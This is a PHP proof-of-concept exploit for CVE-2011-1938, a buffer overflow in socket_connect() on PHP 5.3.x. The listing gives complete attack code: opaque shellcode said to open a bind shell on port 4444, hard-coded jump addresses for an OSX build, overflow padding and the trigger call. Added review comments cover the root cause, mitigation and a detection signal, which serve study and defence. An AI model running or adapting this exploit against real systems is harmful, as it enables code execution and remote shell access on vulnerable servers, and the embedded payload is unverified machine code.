PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability - [CVE: 2011-1938] 2011-05-25 16:15:05

# Exploit Title: php socket_connect() buffer overflow
# Date: 2011.05.25
# Author: S2 Crew [Hungary]
# Software Link: php.net
# Version: PHP 5.2.14 (tested); 5.3.3-5.3.6
# Tested on: OSX 10.5.8
# CVE: -

<?php

# Proof of concept for the stack-based buffer overflow in socket_connect()
# tracked as CVE-2011-1938 (the id is given in the page title): an over-long
# path handed to socket_connect() as the address of an AF_UNIX socket
# overflows a fixed-size buffer on the affected builds (5.3.3-5.3.6 per the
# header; 5.2.14 tested on OSX 10.5.8).
# NOTE(review): the root cause is presumably the path being copied into a
# fixed-size sockaddr_un without a length check — confirm against the fixed
# ext/sockets source. The trust boundary this crosses is "can run PHP code
# that calls socket_connect() with a chosen path", so it matters most on
# shared hosting and in sandboxed-script setups where script execution is
# otherwise contained. Mitigation: run a release outside the affected range,
# or disable the sockets extension where it is not needed.

# Bindshell on port 4444
# Opaque machine-code payload. "Bindshell on port 4444" is the author's claim
# and cannot be verified from this listing; treat it as an untrusted blob and
# do not execute it. If it did run as described, a new listening socket on
# port 4444 would be the observable a defender looks for.
$sc =
"\xdb\xd2\x29\xc9\xb1\x27\xbf\xb1\xd5\xb6\xd3\xd9\x74\x24".
"\xf4\x5a\x83\xea\xfc\x31\x7a\x14\x03\x7a\xa5\x37\x43\xe2".
"\x05\x2e\xfc\x45\xd5\x11\xad\x17\x65\xf0\x80\x18\x8a\x71".
"\x64\x19\x94\x75\x10\xdf\xc6\x27\x70\x88\xe6\xc5\x65\x14".
"\x6f\x2a\xef\xb4\x3c\xfb\xa2\x04\xaa\xce\xc3\x17\x4d\x83".
"\x95\x85\x21\x49\xd7\xaa\x33\xd0\xb5\xf8\xe5\xbe\x89\xe3".
"\xc4\xbf\x98\x4f\x5f\x78\x6d\xab\xdc\x6c\x8f\x08\xb1\x25".
"\xc3\x3e\x6f\x07\x63\x4c\xcc\x14\x9f\xb2\xa7\xeb\x51\x75".
"\x17\x5c\xc2\x25\x27\x67\x2f\x45\xd7\x08\x93\x6b\xa2\x21".
"\x5c\x31\x81\xb2\x1f\x4c\x19\xc7\x08\x80\xd9\x77\x5f\xcd".
"\xf6\x04\xf7\x79\x27\x89\x6e\x14\xbe\xae\x21\xb8\x93\x60".
"\x72\x03\xde\x01\x43\xb4\xb0\x88\x47\x64\x60\xd8\xd7\xd5".
"\x30\xd9\x1a\x55\x01\x26\xf4\x06\x21\x6b\x75\xac";

# 20 bytes of filler.
$x = str_repeat("X",20);
# Absolute addresses into the author's OSX 10.5.8 test build (see header).
# They are environment-specific, which makes this PoC non-portable; the
# symbolic names are the author's and nothing on this page derives them.
$JMP_BUF = 0x8fe2e111;
$SETJMP = 0x8fe1cf38;
$STRDUP = 0x8fe210dc;
# 8fe24459 jmp *%eax
$JMP_EAX = 0x8fe24459;

# Short raw machine-code fragments; their intent is asserted only by the
# author's naming and is not verifiable from this listing.
$frag0 = "\x90\x58\x61\xc3";
$frag1 = "\x90\x58\x89\xe0".
"\x83\xc0\x0c\x89".
"\x44\x24\x08\xc3";

# 188 bytes of filler. The length is an offset the author chose empirically
# for their build; it is not derivable from this page.
$a = str_repeat("A",188);

# The malformed "path": filler, the two fragments, the addresses above packed
# with "I" (unsigned int in machine byte order and size — presumably 4-byte
# little-endian on the tested Intel Mac), and the payload. Summing the pieces
# gives roughly 440 bytes, far beyond any legitimate UNIX-socket path. That
# size is the detection signal: a socket_connect() call carrying an AF_UNIX
# address this long is anomalous and worth alerting on.
$buff =
$a.$frag0.pack("I",$SETJMP).pack("I",$JMP_BUF+32).pack("I",$JMP_BUF).$frag1.$x.pack("I",$SETJMP).pack("I",$JMP_BUF+24).pack("I",$JMP_BUF).pack("I",$STRDUP).pack("I",$JMP_EAX)."XXXX".$sc;

# Trigger: an AF_UNIX stream socket plus the oversized path as its address.
# NOTE(review): a patched socket_connect() presumably rejects a path longer
# than the sockaddr_un capacity before copying it — confirm against the fixed
# source; on an affected build this call is where the overflow happens.
$s = socket_create(AF_UNIX, SOCK_STREAM, 0);
socket_connect($s,$buff,0);
?>